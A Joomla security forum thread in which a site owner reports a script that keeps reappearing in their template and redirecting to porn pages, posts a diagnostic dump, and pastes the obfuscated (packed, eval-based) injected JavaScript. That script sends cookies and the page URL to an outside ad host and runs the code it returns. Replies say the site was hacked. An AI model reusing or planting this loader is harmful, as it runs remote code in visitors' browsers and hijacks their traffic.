I get strange <script> ... </script> code and I get some unwanted pages.

Discussion regarding Joomla! 3.x security issues.

Moderators: mandville, General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
Windows Defender SmartScreen Issues <-- please read this if using Windows 10.
Locked
sylwekb
Joomla! Explorer
Joomla! Explorer
Posts: 384
Joined: Mon Mar 14, 2011 5:08 pm

I get strange <script> ... </script> code and I get some unwanted pages.

Post by sylwekb » Fri Dec 17, 2021 8:09 am

Hello
For some time now, on my page, in the last line of the template file, I get strange <script> ... </script> code and I get some unwanted pages. Joomla updated to version 3.10.4 and does not show new extension updates or template updates.

What is the cause. Below FPA.
Forum Post Assistant (v1.6.4) : 17-Dec-2021 wrote:
Basic Environment :: wrote:Joomla! Instance :: Joomla! 3.10.4-Stable (Daraja) 11-December-2021
Joomla! Platform :: Joomla Platform 13.1.0-Stable (Curiosity) 24-Apr-2013
Joomla! Configured :: Yes | Read-Only (444) |
Configuration Options :: Offline: false | SEF: true | SEF Suffix: false | SEF ReWrite: true | .htaccess/web.config: Yes | GZip: true | Cache: true | CacheTime: 1440 | CacheHandler: file | CachePlatformPrefix: true | FTP Layer: false | Proxy: false | LiveSite: | Session lifetime: 30 | Session handler: database | Shared sessions: false | SSL: 2 | Error Reporting: default | Site Debug: false | Language Debug: false | Default Access: 1 | Unicode Slugs: true | dbConnection Type: mysqli | PHP Supports J! 3.10.4: Yes | Database Supports J! 3.10.4: Yes | Database Credentials Present: Yes |

Host Configuration :: OS: Linux | OS Version: 4.4.254.core2.261 | Technology: x86_64 | Web Server: Apache | Encoding: gzip, deflate, br | System TMP Writable: Yes | Free Disk Space : 589.40 GiB |

PHP Configuration :: Version: 7.4.7 | PHP API: apache2handler | Session Path Writable: Yes | Display Errors: 0 | Error Reporting: 4437 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Allow url fopen: 1 | Open Base: | Uploads: 1 | Max. Upload Size: 150M | Max. POST Size: 150M | Max. Input Time: 60 | Max. Execution Time: 500 | Memory Limit: 256M

Database Configuration :: Version: 5.7.29-32-log (Client:mysqlnd 7.4.7) | Database Size: 22.19 MiB | #of Tables with config prefix: 156 | #of other Tables: 0 | User Privileges : GRANT ALL
Detailed Environment :: wrote:PHP Extensions :: Core (7.4.7) | date (7.4.7) | libxml (7.4.7) | openssl (7.4.7) | pcre (7.4.7) | zlib (7.4.7) | bcmath (7.4.7) | bz2 (7.4.7) | calendar (7.4.7) | ctype (7.4.7) | dba (7.4.7) | dom (20031129) | hash (7.4.7) | fileinfo (7.4.7) | filter (7.4.7) | ftp (7.4.7) | gd (7.4.7) | gettext (7.4.7) | SPL (7.4.7) | iconv (7.4.7) | json (7.4.7) | mbstring (7.4.7) | session (7.4.7) | standard (7.4.7) | posix (7.4.7) | Reflection (7.4.7) | Phar (7.4.7) | shmop (7.4.7) | SimpleXML (7.4.7) | soap (7.4.7) | sockets (7.4.7) | exif (7.4.7) | sysvmsg (7.4.7) | sysvsem (7.4.7) | sysvshm (7.4.7) | tokenizer (7.4.7) | xml (7.4.7) | xmlreader (7.4.7) | xmlwriter (7.4.7) | zip (1.15.6) | apache2handler (7.4.7) | mysqlnd (mysqlnd 7.4.7) | curl (7.4.7) | imap (7.4.7) | intl (7.4.7) | ldap (7.4.7) | mysqli (7.4.7) | odbc (7.4.7) | PDO (7.4.7) | pdo_mysql (7.4.7) | PDO_ODBC (7.4.7) | pdo_pgsql (7.4.7) | pdo_sqlite (7.4.7) | pgsql (7.4.7) | pspell (7.4.7) | sodium (7.4.7) | sqlite3 (7.4.7) | tidy (7.4.7) | xmlrpc (7.4.7) | xsl (7.4.7) | Zend OPcache (7.4.7) | Zend Engine (3.4.0) |
Potential Missing Extensions ::

Switch User Environment :: PHP CGI: No | Server SU: No | PHP SU: No | Potential Ownership Issues: No

Apache Modules :: core | mod_log_config | mod_logio | prefork | http_core | mod_so | mod_actions | mod_alias | mod_asis | mod_auth_basic | mod_authn_file | mod_authz_default | mod_authz_groupfile | mod_authz_host | mod_authz_user | mod_autoindex | mod_cern_meta | mod_cgi | mod_dir | mod_env | mod_expires | mod_headers | mod_include | mod_mime | mod_mime_magic | mod_negotiation | mod_php7 | mod_cloudflare | mod_rewrite | mod_setenv | mod_setenvif | mod_speling | mod_ssl | mod_status | mod_tld_stat | mod_vhost_alias | Apache |
Potential Missing Modules :: mod_deflate |
Folder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) | administrator/logs/ (755) |

Elevated Permissions (First 10) ::
Database Information :: wrote:Database statistics :: Uptime: 16005153 | Threads: 1 | Questions: 2653575570 | Slow queries: 380069 | Opens: 31114754 | Flush tables: 1 | Open tables: 16384 | Queries per second avg: 165.795 |
Extensions Discovered :: wrote:Components :: Site ::
Core :: com_wrapper (3.0.0) 1 | com_mailto (3.0.0) 1 |
3rd Party:: WF_CONTEXTMENU_TITLE (2.6.36) ? | WF_ARTICLE_TITLE (2.6.36) ? | WF_LISTS_TITLE (2.6.36) ? | WF_INLINEPOPUPS_TITLE (2.6.36) ? | WF_SOURCE_TITLE (2.6.36) ? | WF_STYLESELECT_TITLE (2.6.36) ? | WF_ANCHOR_TITLE (2.6.36) ? | WF_FULLSCREEN_TITLE (2.6.36) ? | WF_SPELLCHECKER_TITLE (2.6.36) ? | WF_DIRECTIONALITY_TITLE (2.6.36) ? | WF_AUTOSAVE_TITLE (2.6.36) ? | WF_STYLE_TITLE (2.6.36) ? | WF_HR_TITLE (2.6.36) ? | WF_IMGMANAGER_TITLE (2.6.36) ? | WF_VISUALBLOCKS_TITLE (2.6.36) ? | WF_MEDIA_TITLE (2.6.36) ? | WF_BROWSER_TITLE (2.6.36) ? | WF_KITCHENSINK_TITLE (2.6.36) ? | WF_LINK_TITLE (2.6.36) ? | WF_CLIPBOARD_TITLE (2.6.36) ? | WF_PREVIEW_TITLE (2.6.36) ? | WF_XHTMLXTRAS_TITLE (2.6.36) ? | WF_FORMATSELECT_TITLE (2.6.36) ? | WF_EMOTIONS_TITLE (2.6.36) ? | WF_FONTCOLOR_TITLE (2.6.36) ? | WF_VISUALCHARS_TITLE (2.6.36) ? | WF_TEXTCASE_TITLE (2.6.36) ? | WF_FONTSELECT_TITLE (2.6.36) ? | WF_NONBREAKING_TITLE (2.6.36) ? | WF_CLEANUP_TITLE (2.6.36) ? | WF_PRINT_TITLE (2.6.36) ? | WF_SEARCHREPLACE_TITLE (2.6.36) ? | WF_CHARMAP_TITLE (2.6.36) ? | WF_TABLE_TITLE (2.6.36) ? | WF_LAYER_TITLE (2.6.36) ? | WF_FONTSIZESELECT_TITLE (2.6.36) ? | WF_LINK_SEARCH_TITLE (2.6.36) ? | WF_LINKS_JOOMLALINKS_TITLE (2.6.36) ? | WF_POPUPS_WINDOW_TITLE (2.6.36) ? | WF_POPUPS_JCEMEDIABOX_TITLE (2.6.36) ? | WF_AGGREGATOR_VINE_TITLE (2.6.36) ? | WF_AGGREGATOR_VIMEO_TITLE (2.6.36) ? | WF_AGGREGATOR_DAILYMOTION_TITLE (2.6.36) ? | WF_AGGREGATOR_[youtube]_TITLE (2.6.36) ? | WF_FILESYSTEM_JOOMLA_TITLE (2.6.36) ? |

Components :: Admin ::
Core :: com_admin (3.0.0) 1 | com_joomlaupdate (3.10.1) 1 | com_cache (3.0.0) 1 | com_search (3.0.0) 1 | com_messages (3.0.0) 1 | com_newsfeeds (3.0.0) 1 | com_associations (3.7.0) 1 | com_contenthistory (3.2.0) 1 | com_checkin (3.0.0) 1 | com_login (3.0.0) 1 | com_installer (3.0.0) 1 | com_media (3.0.0) 1 | com_modules (3.0.0) 1 | com_content (3.0.0) 1 | com_postinstall (3.2.0) 1 | com_languages (3.0.0) 1 | com_privacy (3.9.0) 1 | com_ajax (3.2.0) 1 | com_banners (3.0.0) 1 | com_cpanel (3.0.0) 1 | com_plugins (3.0.0) 1 | com_actionlogs (3.9.0) 1 | com_fields (3.7.0) 1 | com_categories (3.0.0) 1 | com_templates (3.0.0) 1 | com_users (3.0.0) 1 | com_menus (3.0.0) 1 | com_config (3.0.0) 1 | com_redirect (3.0.0) 1 | com_tags (3.1.0) 1 | com_finder (3.0.0) 1 |
3rd Party:: tcpdf (1.0.9) 1 | tcpdf (1.0.0) 1 | JCH Optimize (5.4.3) 1 | COM_JCE (2.6.36) 1 | VirtueMart_allinone (-) 1 | VirtueMart_allinone (-) 1 | RokSprocket (2.1.24) 1 | com_attachments (3.2.6) 1 | ECB Currency Converter (1.0) ? | VIRTUEMART (-) 1 |

Modules :: Site ::
Core :: mod_languages (3.5.0) 1 | mod_tags_similar (3.1.0) 1 | mod_articles_archive (3.0.0) 1 | mod_menu (3.0.0) 1 | mod_wrapper (3.0.0) 1 | mod_random_image (3.0.0) 1 | mod_search (3.0.0) 1 | mod_tags_popular (3.1.0) 1 | mod_finder (3.0.0) 1 | mod_banners (3.0.0) 1 | mod_articles_popular (3.0.0) 1 | mod_syndicate (3.0.0) 1 | mod_articles_category (3.0.0) 1 | mod_whosonline (3.0.0) 1 | mod_feed (3.0.0) 1 | mod_articles_categories (3.0.0) 1 | mod_articles_news (3.0.0) 1 | mod_users_latest (3.0.0) 1 | mod_login (3.0.0) 1 | mod_stats (3.0.0) 1 | mod_articles_latest (3.0.0) 1 | mod_related_items (3.0.0) 1 | mod_footer (3.0.0) 1 | mod_custom (3.0.0) 1 | mod_breadcrumbs (3.0.0) 1 |
3rd Party:: Hot Image Slider (3.1.1) 1 | mod_virtuemart_product (3.8.9) 1 | SP VirtueMart Product Slider (1.1) 1 | mod_virtuemart_manufacturer (3.8.9) 1 | JS Like Box Slider (6.8.96) 1 | mod_virtuemart_cart (3.8.9) 1 | mod_virtuemart_currencies (3.8.9) 1 | Slideshow CK (1.4.61) 1 | Facebook Like Box Slider (1.0) 1 | JE Parallax Slideshow (3.4) 1 | mod_virtuemart_category (3.8.9) 1 | DJ-LikeBox (3.0) 1 | SDG Facebook Slider (2.0) 1 | googleMaps module (3.0) 1 | BT Content Slider (2.3.8) 1 | JS FlexSlider (2.2) 1 | mod_virtuemart_search (3.8.9) 1 | RokSprocket Module (2.1.24) 1 |

Modules :: Admin ::
Core :: mod_logged (3.0.0) 1 | mod_submenu (3.0.0) 1 | mod_popular (3.0.0) 1 | mod_latestactions (3.9.0) 1 | mod_status (3.0.0) 1 | mod_title (3.0.0) 1 | mod_version (3.0.0) 1 | mod_multilangstatus (3.0.0) 1 | mod_menu (3.0.0) 1 | mod_quickicon (3.0.0) 1 | mod_sampledata (3.8.0) 1 | mod_toolbar (3.0.0) 1 | mod_feed (3.0.0) 1 | mod_login (3.0.0) 1 | mod_privacy_dashboard (3.9.0) 1 | mod_stats_admin (3.0.0) 1 | mod_custom (3.0.0) 1 | mod_latest (3.0.0) 1 |
3rd Party:: VirtueMart Administrator Menu (3.8.9) ? |

Libraries ::
Core ::
3rd Party:: Free Mono (-) ? | Helvetica (-) ? |

Plugins ::
Core :: plg_captcha_recaptcha (3.4.0) 1 | plg_captcha_recaptcha_invisible (3.8) 0 | PLG_ACTIONLOG_JOOMLA (3.9.0) 1 | PLG_INSTALLER_FOLDERINSTALLER (3.6.0) 1 | plg_installer_packageinstaller (3.6.0) 1 | PLG_INSTALLER_URLINSTALLER (3.6.0) 1 | plg_twofactorauth_yubikey (3.2.0) 0 | plg_twofactorauth_totp (3.2.0) 0 | plg_user_terms (3.9.0) 0 | plg_user_contactcreator (3.0.0) 0 | plg_user_joomla (3.0.0) 1 | plg_user_profile (3.0.0) 0 | plg_search_contacts (3.0.0) 1 | plg_search_content (3.0.0) 1 | plg_search_tags (3.0.0) 1 | plg_search_newsfeeds (3.0.0) 1 | plg_search_categories (3.0.0) 1 | plg_content_pagebreak (3.0.0) 1 | plg_content_emailcloak (3.0.0) 1 | plg_content_confirmconsent (3.9.0) 0 | plg_content_vote (3.0.0) 1 | plg_content_pagenavigation (3.0.0) 1 | plg_content_joomla (3.0.0) 1 | plg_content_loadmodule (3.0.0) 1 | plg_content_fields (3.7.0) 1 | plg_content_finder (3.0.0) 0 | plg_system_sessiongc (3.8.6) 1 | PLG_SYSTEM_ACTIONLOGS (3.9.0) 0 | plg_system_highlight (3.0.0) 1 | plg_system_privacyconsent (3.9.0) 0 | plg_system_remember (3.0.0) 1 | plg_system_logrotation (3.9.0) 1 | plg_system_p3p (3.0.0) 0 | plg_system_sef (3.0.0) 1 | plg_system_logout (3.0.0) 1 | plg_system_stats (3.5.0) 1 | plg_system_cache (3.0.0) 0 | plg_system_debug (3.0.0) 1 | plg_system_updatenotification (3.5.0) 1 | plg_system_redirect (3.0.0) 0 | plg_system_languagefilter (3.0.0) 0 | plg_system_log (3.0.0) 1 | plg_system_languagecode (3.0.0) 0 | plg_system_fields (3.7.0) 1 | plg_editors-xtd_article (3.0.0) 1 | plg_editors-xtd_pagebreak (3.0.0) 1 | plg_editors-xtd_menu (3.7.0) 1 | plg_editors-xtd_module (3.5.0) 1 | plg_editors-xtd_image (3.0.0) 1 | plg_editors-xtd_readmore (3.0.0) 1 | plg_editors-xtd_fields (3.7.0) 1 | plg_privacy_actionlogs (3.9.0) 1 | plg_privacy_consents (3.9.0) 1 | plg_privacy_user (3.9.0) 1 | plg_privacy_content (3.9.0) 1 | plg_privacy_message (3.9.0) 1 | plg_authentication_gmail (3.0.0) 0 | plg_authentication_joomla (3.0.0) 1 | plg_authentication_cookie (3.0.0) 1 | plg_authentication_ldap (3.0.0) 0 | plg_extension_joomla (3.0.0) 1 | plg_quickicon_extensionupdate (3.0.0) 1 | plg_quickicon_phpversioncheck (3.7.0) 1 | plg_quickicon_privacycheck (3.9.0) 1 | plg_quickicon_joomlaupdate (3.0.0) 1 | plg_quickicon_eos310 (3.10.0) ? | plg_fields_url (3.7.0) 1 | plg_fields_usergrouplist (3.7.0) 1 | plg_fields_color (3.7.0) 1 | plg_fields_user (3.7.0) 1 | plg_fields_list (3.7.0) 1 | plg_fields_calendar (3.7.0) 1 | plg_fields_integer (3.7.0) 1 | plg_fields_textarea (3.7.0) 1 | plg_fields_text (3.7.0) 1 | plg_fields_imagelist (3.7.0) 1 | plg_fields_checkboxes (3.7.0) 1 | plg_fields_media (3.7.0) 1 | plg_fields_repeatable (3.9.0) 1 | plg_fields_editor (3.7.0) 1 | plg_fields_radio (3.7.0) 1 | plg_fields_sql (3.7.0) 1 | plg_finder_contacts (3.0.0) 1 | plg_finder_content (3.0.0) 1 | plg_finder_tags (3.0.0) 1 | plg_finder_newsfeeds (3.0.0) 1 | plg_finder_categories (3.0.0) 1 |
3rd Party:: Realex_hpp_api (3.8.9) ? | plg_captcha_customrecaptcha (2.1.0) 0 | plg_installer_jce (2.6.36) 1 | 2Checkout (3.8.9) ? | Klarna (3.8.6) ? | Standard (3.8.9) ? | Klarna Checkout (3.8.6) ? | AMAZON (3.8.9) ? | PayPal (3.8.9) ? | VM Payment - eway (3.8.9) ? | VM - Płatność, tpay.com (1.3) 1 | Skrill (3.8.9) ? | VM Payment - klikandpay (3.8.9) ? | Sofort Ideal (3.8.9) ? | Sofort (3.8.9) ? | Authorize.net AIM (3.8.9) ? | Heidelpay (16.11.07) ? | VM Payment - Paybox (3.8.9) 0 | realex_hpp_api (3.8.9) ? | plg_search_attachments (3.2.6) 1 | Search - VirtueMart (3.8.9) ? | plg_attachments_for_content (3.2.6) 1 | plg_attachments_plugin_framework (3.2.6) 1 | googleMaps (3.0.23) 0 | plg_content_attachments (3.2.6) 1 | Content - RokInjectModule (2.1.24) 0 | plg_content_jce (2.6.36) 1 | Content - Simple Pop-Up (2.1) 1 | System - JCE MediaBox (1.2.9) 1 | PLG_SYSTEM_JQUERYEASY (3.1.0) 0 | AMAZON (3.8.9) ? | System - RokCommon (3.2.6) 0 | PLG_SYSTEM_VMLOADERPLUGINUPDATE (1.0.2) ? | PLG_SYSTEM_CIACHO (2.5.1) 0 | PLG_SYSTEM_JCH_OPTIMIZE (5.4.3) 1 | plg_system_jce (2.6.36) 1 | plg_system_show_attachments_in_edit (3.2.6) ? | System - RokBooster (1.1.18) 0 | System - RokSprocket (2.1.24) 0 | plg_editors-xtd_add_attachment_btn (3.2.6) 1 | plg_editors-xtd_insert_attachments_ (3.2.6) ? | By weight, ZIP and countries (3.8.9) ? | VMCustom - textinput (3.8.9) ? | plgvm_specification (3.8.9) ? | VM - Custom, Virtuemart Simple Down (${PHING.VERSI) ? | plg_extension_jce (2.6.36) 1 | plg_quickicon_attachments (3.2.6) 1 | plg_quickicon_jce (2.6.36) 1 | plg_editors_codemirror (5.60.0) 1 | plg_editors_jce (2.6.36) 1 | plg_editors_tinymce (4.5.12) 1 | VM - Calculation Avalara Tax (3.8.9) ? | plg_fields_mediajce (2.6.36) 1 |
Templates Discovered :: wrote:Templates :: Site :: protostar (1.0) ? | horme_3 (1.9.0) 0 | horme_3 (1.9.2) 0 | beez3 (3.1.0) ? | horme_3 (1.0.0) 0 | horme_3 (1.9.0) 0 | horme_3 (1.9.1) 0 | vmbeez3 (3.4.2) 1 | horme_3 (1.9.4) 0 | darius (1.0.0) 1 |
Templates :: Admin :: vmadmin (3.8.9) 1 | hathor (3.0.0) 1 | isis (1.0) 1 |
Last edited by toivo on Fri Dec 17, 2021 8:58 am, edited 1 time in total.
Reason: mod note: disabled smilies in post Options for readability
Top
User avatar
brian
Joomla! Master
Joomla! Master
Posts: 12787
Joined: Fri Aug 12, 2005 7:19 am
Location: Leeds, UK
Contact:
Contact brian

Re: I get strange <script> ... </script> code and I get some unwanted pages.

Post by brian » Fri Dec 17, 2021 9:33 am

I get strange <script> ... </script> code and I get some unwanted pages
without knowing details its impossible to say.
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
Top
sylwekb
Joomla! Explorer
Joomla! Explorer
Posts: 384
Joined: Mon Mar 14, 2011 5:08 pm

Re: I get strange <script> ... </script> code and I get some unwanted pages.

Post by sylwekb » Fri Dec 17, 2021 9:53 am

It is a script that is automatically attached to a porn site. I cannot insert the full code because it truncates.
Top
sylwekb
Joomla! Explorer
Joomla! Explorer
Posts: 384
Joined: Mon Mar 14, 2011 5:08 pm

Re: I get strange <script> ... </script> code and I get some unwanted pages.

Post by sylwekb » Fri Dec 17, 2021 11:09 am

I was able to insert this code that is being added all the time. When I delete it, it reappears.

Code: Select all


<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2 15={\'51\':\'//102.61\',\'6\':\'62\',\'48\':38};23 44(){2 3;9{3=25 55("64.52")}7(11){9{3=25 55("63.52")}7(66){3=38}}5(!3&&67 50!=\'69\'){3=25 50()}42 3};23 18(28){2 6=" "+43.6;2 34=" "+28+"=";2 33=17;2 16=0;2 21=0;5(6.13>0){16=6.37(34);5(16!=-1){16+=34.13;21=6.37(";",16);5(21==-1){21=6.13}33=65(6.56(16,21))}}42(33)};23 19(28,47,24,30,31,36){43.6=28+"="+68(47)+((24)?"; 24="+24:"")+((30)?"; 30="+30:"")+((31)?"; 31="+31:"")+((36)?"; 36":"")};(23(12,46){2 22=18(12);5(22==17)22=0;2 32=18(12+\'57\');5(32==17)32=\'[]\';2 29=18(12+\'40\');5(29==17)29=\'[]\';2 3=44();3.60(\'59\',46,58);3.71("70-73","74/91-92-93-94");3.95=23(){5(3.90==4&&3.96==98){9{5(3.45.13==0)42;2 20=41.49(3.45);2 26=\'\';2 14=0;2 39=38;9{26=20[\'99\']}7(11){}9{14=20[\'100\']}7(11){}9{39=(20[\'101\']==1)}7(11){}15[\'48\']=39;5(26.13>0){2 10=25 89();10.88(10.87()+1);5(14>0){19(12+\'86\',14.53(),10.27())}9{19(12+\'85\',20[\'84\'],10.27())}7(11){}5(22==0){19(12,\'1\',10.27())}2 8=17;9{8=41.49(18(15[\'6\']+\'40\'))}7(11){}5(8==17)8=[];5(8.37(14)==-1)8[8.13]=1*14;19(15[\'6\']+\'40\',41.83(8),10.27());54.82(26)}}7(11){}}};3.81(\'80=\'+22.53()+\'&79=\'+35(54.78.77)+\'&76=\'+35(32)+\'&75=\'+35(29))})(15[\'6\'],15[\'51\']+\'/97.72\');',10,103,'||var|xmlhttp||if|cookie|catch|vM|try|vDate|e|sCookieName|length|iT|vXAdsObj|offset|null|getCookie|setCookie|Response|end|iStatus|function|expires|new|sCode|toUTCString|name|sMS|path|domain|sMA|setStr|search|encodeURIComponent|secure|indexOf|false|bM|_ms|JSON|return|document|getXmlHttp|responseText|sUrl|value|mobile|parse|XMLHttpRequest|url|XMLHTTP|toString|window|ActiveXObject|substring|_ma|true|POST|open|fun|xads_platf|Microsoft|Msxml2|unescape|E|typeof|escape|undefined|Content|setRequestHeader|php|type|application|ms|ma|href|location|u|s|send|eval|stringify|fp|_fp|_t|getFullYear|setYear|Date|readyState|x|www|form|urlencoded|onreadystatechange|status|g|200|c|t|m|amads'.split('|'),0,{}))

</script>
Top
gws
Joomla! Champion
Joomla! Champion
Posts: 5951
Joined: Tue Aug 23, 2005 1:56 pm
Location: South coast, UK
Contact:
Contact gws

Re: I get strange <script> ... </script> code and I get some unwanted pages.

Post by gws » Fri Dec 17, 2021 11:40 am

It would suggest that you have been hacked. Check out mysites.guru the first audit is free.
Top
Locked

Return to “Security in Joomla! 3.x”